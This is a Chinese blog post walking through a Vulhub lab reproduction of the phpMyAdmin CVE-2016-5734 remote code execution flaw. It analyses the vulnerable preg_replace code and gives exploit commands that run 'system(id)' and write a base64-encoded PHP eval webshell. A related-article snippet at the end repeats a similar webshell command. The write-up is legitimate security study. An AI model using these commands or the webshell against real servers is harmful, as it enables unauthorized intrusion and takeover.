[Vulhub](CVE-2016-5734)phpmyadmin 4.0.x-4.6.2远程执行代码漏洞

最新推荐文章于 2023-09-27 18:20:21 发布
最新推荐文章于 2023-09-27 18:20:21 发布
阅读量342 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: php mysql phpmyadmin 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/116451970
版权

0x00 漏洞描述

该漏洞在preg_replace函数中,因为用户提交的信息可以被拼接到第一个参数中。该函数时执行一个正则表达式并实现字符串的搜索和替换。

preg_replace ( string|array $pattern , string|array $replacement , string|array $subject , int $limit = -1 , int &$count = null ) : string|array|null
搜索 subject 中匹配 pattern 的部分,以 replacement 进行替换。
参数:

  • pattern:要搜索的模式。可以是一个字符串或字符串数组;
  • replacement:用于替换的字符串或字符串数组;
  • subject:要进行搜索和替换的字符串或字符串数组;
  • limit:每个模式再每个subject上进行替换的最大次数;
  • count:如果指定,将会被填充为完成的替换次数。
    该函数的返回值:当subject为一数组的情况下返回一个数组,其余情况返回字符串。匹配成功则将替换后的subject被返回,不成功则返回没有改变的subject,发生语法错误等,返回NULL。

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞:

  1. 第一个参数需要 e 标识符号,有了它可以执行第二个参数的命令;
  2. 第一个参数需要再第三个参数中有匹配,不然echo会返回第三个参数而不执行命令。

0x01 影响范围

php < 5.4.7
4.0.10.16之前4.0.x版本
4.4.15.7之前4.4.x版本
4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞)

0x02 漏洞成因

找到preg_replace()函数的调用位置,发现存在漏洞的文件代码是TableSearch.class.php

function _getRegexReplaceRows($columnIndex, $find, $replaceWith, $charSet)
{
    $column = $this->_columnNames[$columnIndex];
    $sql_query = "SELECT "
        . PMA_Util::backquote($column) . ","
        . " 1," // to add an extra column that will have replaced value
        . " COUNT(*)"
        . " FROM " . PMA_Util::backquote($this->_db)
        . "." . PMA_Util::backquote($this->_table)
        . " WHERE " . PMA_Util::backquote($column)
        . " RLIKE '" . PMA_Util::sqlAddSlashes($find) . "' COLLATE "
        . $charSet . "_bin"; // here we
        // change the collation of the 2nd operand to a case sensitive
        // binary collation to make sure that the comparison is case sensitive
    $sql_query .= " GROUP BY " . PMA_Util::backquote($column)
        . " ORDER BY " . PMA_Util::backquote($column) . " ASC";

    $result = $GLOBALS['dbi']->fetchResult($sql_query, 0);

    if (is_array($result)) {
        foreach ($result as $index=>$row) {
            $result[$index][1] = preg_replace(
                "/" . $find . "/",
                $replaceWith,
                $row[0]
            );
        }
    }
    return $result;
}

可以发现_getRegexReplaceRows()函数中将find参数传入,并将find参数作为preg_replace()函数的第一个参数使用;要构造payload就要将这三个参数溯源查看。

首先对_getRegexReplaceRows()函数进行溯源,同一文件下_getRegexReplaceRows()getReplacePreview这个方法调用,并且find参数和replacement参数都是经过该方法所传递,对这个函数进行溯源:

function getReplacePreview($columnIndex, $find, $replaceWith, $useRegex,
        $charSet
    ) {
        $column = $this->_columnNames[$columnIndex];
        if ($useRegex) {
            $result = $this->_getRegexReplaceRows(
                $columnIndex, $find, $replaceWith, $charSet
            );
        }

发现getReplacePreviewtbl_find_replace.php中使用,并且findreplaceWith参数经POST方法进行传递。

if (isset($_POST['find'])) {
	$preview = $table_search -> getReplacePreview(
		$_POST['columnIndex'],
		$_POST['find'],
		$_POST['replaceWith'],
		$_POST['useRegex'],
		$connectionCharSet
	);
	$response->addJSON('preview', $preview);
	exit;
}

至此参数与函数溯源完毕,接下来就是利用构造。

0x03 漏洞复现

这个漏洞目前没办法直接利用,因为有token限制,需要登陆抓到token,同时需要构造第三个参数保证和第一个参数匹配上,第一个参数可控而第三个参数是从数据库中取出的,所以只能提前插入到数据库中然后再取出来,columnIndex是取出的字段值可控,所以第三个参数也可控了,

需要登录且能够写入数据,先创建个表,然后表中插入个字段值为"0/e";

利用构造如下:

$find = '0/e';
$fromsqldata = '0/e';
echo preg_replace("/".$find."\0/", $_POST["replaceWith"], $fromsqldate);

// 组后之后类似于:
echo preg_replace('/0/e', 'system(id)', '0/e');

这里直接使用kali自带exp:

searchsploit phpmyadmin

在这里插入图片描述
通过exp执行id命令:

python3 40185.py -u root --pwd="root" http://xx.xx.xx.xx:8080/ -c 'system(id);'

在这里插入图片描述
代码执行成功

0x04 getshell

通过exp写入一句话木马:

python3 40185.py -u root --pwd="root" http://172.16.10.71:8080/ -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pOz8+'));"

在这里插入图片描述
这里显示失败不用管,实际上木马已经写入,进入docker容器查看:
在这里插入图片描述
验证,访问木马地址:
在这里插入图片描述

使用菜刀成功连接:
在这里插入图片描述

参考链接:
https://www.jianshu.com/p/8e44cb1b5b5b(phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞)

yAnd0n9
关注
专栏目录
Vulhub-Mysql 身份认证绕过漏洞CVE-2012-2122)
weixin_45540609的博客
09-08 870
一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞范围 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL versions from 5.1.63, 5.5.24, 5.
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734)
jammny
11-24 1033
Phpmyadmin 4.0.x~4.6.2远程执行代码漏洞CVE-2016-5734漏洞详情 在PHP5.4.7以前,preg_replace()函数的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞影响 4.0.x~4.0.10.16版本、4.4.x~4.4.15.7版本、4.6.x~4.6.3版本(PHP版本小于5.4.7) 漏洞分析 https://xz.aliyun.com/t/7836 漏洞利用
[Vulhub](CVE-2018-12613)phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 1015
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
vulhub-phpmyadmin
bqnagus
10-02 354
vulhub-phpmyadmin复现
[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现
fightte的博客
06-05 614
[网络安全任重道远] ~ 题目有点长 ~ 是这样的。这是vulhub复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG ~ vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有 phpmyadmin ----- 是网页版的数据库管理工具, CVE编号是 ----- CVE-2018-12613, 其漏洞有 ----- 文件包含和远程命令执行, ~ 过程 漏洞具体原因可参考: https://www.cnblogs.com/leixiao-/p/
PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞CVE-2016-5734复现
haoxue__的博客
03-05 375
PhpMyAdmin 4.0.x - 4.6.2 远程执行代码漏洞CVE-2016-5734复现
CVE-2016-5734 phpmyadmin远程代码执行漏洞
weixin_51387754的博客
12-06 315
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+
PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现
君莫hacker的博客
09-12 703
0x01 漏洞介绍 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本
CVE-2016-5734phpmyadmin反序列化漏洞复现
weixin_45540609的博客
09-08 497
一、漏洞简介 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 二、漏洞原理 https://www.jianshu.com/p/8e44cb1b5b5b 三、漏洞利用 https://blog.csdn.net/weixin_52777165/article/details/112251253 vulhub搭建环境 访问 poc如下: https:/..
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现
凝聚力安全团队
01-24 2461
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接 漏洞描述   CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x 版本(直至 4.4.15.7),和 4.0.x 版本(直至 4.0.10.16)。 CVE的作者利用在php 5
vulhub-phpmyadminCVE-2016-5734
qq_26947429的博客
07-23 653
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
CVE-2016-5734phpMyAdmin远程代码执行漏洞复现
没事我溜达
04-06 5466
漏洞名称 phpMyAdmin远程代码执行漏洞CVE-2016-5734) 发布时间 2016年06月21日 漏洞编号 CVE-2016-5734 威胁类型 远程代码执行 危害级别 严重 影响版本 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4...
vulhub漏洞复现52_phpMyAdmin
weixin_44193247的博客
02-11 690
vulhub漏洞复现练习篇
CVE-2016-5734 phpmyadmin 远程命令执行漏洞
最新发布
qq_41567985的博客
09-27 486
CVE-2016-5734在exploit-db上也就是phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的4.6.x版本(直至4.6.3),4.4.x版本(直至4.4.15.7),和4.0.x版本(直至4.0.10.16)。CVE的作者利用在php5.4.7之前的版本中preg_replace函数对空字节的错误处理Bug,使注入的代码远程执行
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 619
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
CVE-2016-5734漏洞复现
qq_56426046的博客
09-11 482
PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞
phpMyAdmin 常见漏洞利用记录
The current road is different, love needs to distinguish between right and wrong
11-26 2517
目录 简介 phpmyadmin版本信息获取 phpmyadmin密码爆破 phpmyadmin文件写入 phpmyadmin日志写shell phpmyadmin版本漏洞 phpmyadmin 2.x版本反序列化漏洞任意文件读取(wooyun-2016-199433) CVE-2016-5734 RCE命令执行 CVE-2018-12613 文件包含 结语 简介 phpMyAdmin 是一个以PHP为基础,以WebBase方式架构在网站主机上的MySQL的数据库...
CVE-2019-19781 Citrix漏洞远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值